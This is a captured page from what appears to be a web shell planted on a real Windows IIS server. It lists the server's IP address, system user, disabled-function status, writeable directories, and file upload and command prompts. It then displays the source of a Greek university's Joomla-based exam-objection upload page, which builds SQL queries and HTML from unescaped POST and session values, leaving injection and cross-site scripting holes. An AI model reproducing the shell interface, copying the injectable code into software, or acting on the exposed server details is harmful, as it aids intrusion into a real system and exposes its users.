403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Old Sites/ees_request/externalpages/ams/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Old Sites/ees_request/externalpages/ams/objection_upload.php
<?php
    include('config.php');
    define( '_JEXEC', 1 );
    define('JPATH_BASE', dirname(__FILE__) );
    define( 'DS', DIRECTORY_SEPARATOR );
    require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
    require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );
    require_once ( JPATH_BASE .DS.'libraries'.DS.'joomla'.DS.'factory.php' );
    
    session_start();

    $mainframe =& JFactory::getApplication('site');
    $user =& JFactory::getUser();             
    
    if (!$user->guest) {
        $db_connection=mysql_connect($host, $username, $password, $db_name);
        if (!$db_connection) {
            die("<br><b>Database Error:</b> Could not connected. Try again later.<br>");
            exit;
        }
        @mysql_select_db($db_name, $db_connection) or die("Unable to select database.");
        mysql_query("SET NAMES 'utf8'", $db_connection);
        
        ?>
            <br>
                    <a HREF="javascript:history.go(-3)">Τμήμα <?php echo $_POST['departmentName']; ?></a> > 
                    <a HREF="javascript:history.go(-2)"><?php echo $_POST['sectionName']; ?></a> > 
                    <a HREF="javascript:history.go(-1)"> Επιλογή Μαθήματος </a> > Επιλογή Αρχείου Ένστασης 
        
        <?php

        if(sizeof($_POST['lesson']) != 0) {
            
            $checkQuery = "SELECT * FROM objection 
                           WHERE departmentId='".$_SESSION['DEPARTMENT_ID']."' AND sectionId='". $_SESSION['SECTION_ID']."'
                           AND lessonId='".$_POST['lesson']."' AND userId='".$user->id."'";
            $checkResult = mysql_query($checkQuery);
            
            if( mysql_numrows($checkResult) == 0 ) {
            
            $_SESSION['LESSON_ID'] = $_POST['lesson'];
            
            session_register('EDUCATOR_NOTES'); 
            session_register('SEMESTER_TEACHING');

            ?>

               
                <form method="post" action="?option=com_content&view=article&id=62" enctype="multipart/form-data">
                    <input type="hidden" name="departmentName" value="<?php echo $_POST['departmentName']; ?>">
                    <input type="hidden" name="sectionName" value="<?php echo $_POST['sectionName']; ?>">  
        
                    <br><br>
                        <?php  
                                $Q = "SELECT lessonTitle, semester FROM lesson WHERE id='".$_POST['lesson']."'";
                                 
                                $result = mysql_query($Q);
                                $row = mysql_fetch_array($result);
                        ?>
                          Η Ένστασή σας αφορά το Μάθημα       
                                   <b><?php echo $row['lessonTitle'];?></b> 
                          του <b>
                                   <?php echo $row['semester'];?>ου εξαμήνου </b>. 
                          <br><br>

                        <table align="center" bgcolor="#F0F0F0">
                            <th bgcolor="#B9EEAC" colspan="2" align="left"> <b>Καταχώρηση αρχείου Εναστάσεως</b>  </th>
                            <tr>
                                <td colspan="2"> &nbsp;</td>  
                            </tr>
                            <tr>
                                <td>Αρχείο </td> <td>
                                <?php 
                                    if( preg_match('/Chrome/i', $_SERVER['HTTP_USER_AGENT']) || preg_match('/Safari/i', $_SERVER['HTTP_USER_AGENT'])  ) {
                                        ?>
                                            <div class="fileinputs">   
                                                <input type="file" name="fileatt" size="70" class="file" />
                                                    <div class="fakefile">
                                                        <input />
                                                        <input type="button" value="Αναζήτηση">
                                                    </div>
                                            </div>
                                         <?php
                                    }
                                    else {
                                        ?> <input type="file" name="fileatt" size="70" /> <?php    
                                    }
                                ?>  
                                </td>
                            </tr>
                            <tr>
                                <td colspan="2"> &nbsp;</td>  
                            </tr>
                            <tr>
                                <td colspan="2" align="right" bgcolor="#B9EEAC"> <input type="submit" value=" Αποστολή "></td>  
                            </tr>
                        </table>
                </form>
            <?php 
            }
            else {
                 echo "<br><br><font color='red'>Έχετε ήδη αποστείλει ένσταση για το συγκεκριμένο μάθημα.</font>"; 
                 echo "<br><br>Επιλέξτε κάποιο άλλο μάθημα. [ <a href='javascript:history.go(-1)'> + Προσθήκη Μαθήματος</a> ] ";   
            }
        }
        else {
            echo "<br><br><font color='red'>Δεν έχετε επιλέξει κάποιο μάθημα.</font>";
            echo " [ <a href='javascript:history.go(-1)'> + Προσθήκη Μαθήματος</a> ] ";                 
        }    
    }
    else {
        echo "<br><font color='red'>Απογορεύεται η πρόσβαση. Δεν είστε συνδεδεμένοι!</font>";
    }
?>

Youez - 2016 - github.com/yon3zu
LinuXploit